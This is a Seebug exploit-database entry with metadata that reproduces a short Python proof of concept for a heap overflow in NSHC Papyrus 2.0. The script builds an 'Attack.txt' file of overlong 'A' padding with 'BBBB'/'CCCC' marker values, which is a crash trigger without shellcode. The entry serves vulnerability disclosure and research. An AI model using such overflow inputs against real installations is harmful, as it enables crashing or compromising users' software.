ID SSV:71964 Type seebug Reporter Root Modified 2014-07-01T00:00:00
Description
No description provided by source.
#!/usr/bin/python
#
# Title: NSHC Papyrus Heap Overflow Vulnerability
# Date: 13\08\2011
# Author: wh1ant
# Software Link: http://file.atfile.com/ftp/data/03/PapyrusSetup.exe
# Version: 2.0
# Tested On: windows XP SP3 South Korea / windows XP SP3 English VMware Workstation
# CVE: N/A
# Notice:
# Encrypt/Decrypt programs that are created by NSHC
#
fd = open("Attack.txt", "w")
data = 'A'
for i in range(0, 1003):
fd.write(data)
fd.write("BBBB");
fd.write("CCCC");
for i in range(0, 2000):
fd.write(data);
fd.close()
{"lastseen": "2017-11-19T14:02:25", "modified": "2014-07-01T00:00:00", "description": "No description provided by source.", "cvss": {"score": 0.0, "vector": "NONE"}, "published": "2014-07-01T00:00:00", "status": "poc", "enchantments": {"score": {"value": 0.1, "vector": "NONE", "modified": "2017-11-19T14:02:25", "rev": 2}, "dependencies": {"references": [], "modified": "2017-11-19T14:02:25", "rev": 2}, "vulnersScore": 0.1}, "href": "https://www.seebug.org/vuldb/ssvid-71964", "references": [], "enchantments_done": [], "id": "SSV:71964", "title": "NSHC Papyrus 2.0 - Heap Overflow Vulnerability", "bulletinFamily": "exploit", "reporter": "Root", "cvelist": [], "viewCount": 4, "sourceData": "\n #!/usr/bin/python\r\n# \r\n# Title: NSHC Papyrus Heap Overflow Vulnerability \r\n# Date: 13\\08\\2011 \r\n# Author: wh1ant\r\n# Software Link: http://file.atfile.com/ftp/data/03/PapyrusSetup.exe\r\n# Version: 2.0 \r\n# Tested On: windows XP SP3 South Korea / windows XP SP3 English VMware Workstation\r\n# CVE: N/A \r\n# Notice:\r\n# Encrypt/Decrypt programs that are created by NSHC\r\n#\r\n \r\nfd = open("Attack.txt", "w")\r\ndata = 'A'\r\nfor i in range(0, 1003):\r\n fd.write(data)\r\nfd.write("BBBB");\r\nfd.write("CCCC");\r\nfor i in range(0, 2000):\r\n fd.write(data);\r\nfd.close()\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-71964", "type": "seebug"}